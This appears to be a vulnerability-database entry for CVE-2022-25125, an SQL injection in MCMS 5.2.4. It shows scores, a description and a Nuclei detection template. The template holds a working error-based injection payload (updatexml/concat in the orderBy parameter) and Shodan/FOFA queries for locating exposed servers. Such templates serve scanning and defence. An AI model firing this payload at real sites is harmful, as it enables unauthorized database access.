Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-25125
HistoryMar 31, 2023 - 1:50 p.m.

MCMS 5.2.4 - SQL Injection

2023-03-3113:50:12
ProjectDiscovery
github.com
8
mcms
sql injection
mingsoft
cve-2022-25125
cwe-89

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.017

Percentile

88.2%

MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2022-25125

info:
  name: MCMS 5.2.4  - SQL Injection
  author: Co5mos
  severity: critical
  description: |
    MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4.
  reference:
    - https://github.com/ming-soft/MCMS/issues/90
    - https://gitee.com/mingSoft/MCMS/issues/I4TGYI
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25125
    cwe-id: CWE-89
    epss-score: 0.02031
    epss-percentile: 0.87716
    cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mingsoft
    product: mcms
    shodan-query:
      - http.favicon.hash:1464851260
      - http.favicon.hash:"1464851260"
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2022,sqli,mcms,mingsoft
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/mdiy/dict/listExcludeApp?query=1&dictType=1&orderBy=1/**/or/**/updatexml(1,concat(0x7e,md5('{{num}}'),0x7e),1)/**/or/**/1"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fdb25"

      - type: word
        part: header
        words:
          - "application/json"
# digest: 4a0a00473045022100cccf9d0e2f1789b898289d5bb9041fbec265850c276e6b526581e0c499a89a7f022037f6f92d5ee852d6f05f78fedb90254c45fd7f3a354c7fdd7a957808cca3696d:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.017

Percentile

88.2%

Related for NUCLEI:CVE-2022-25125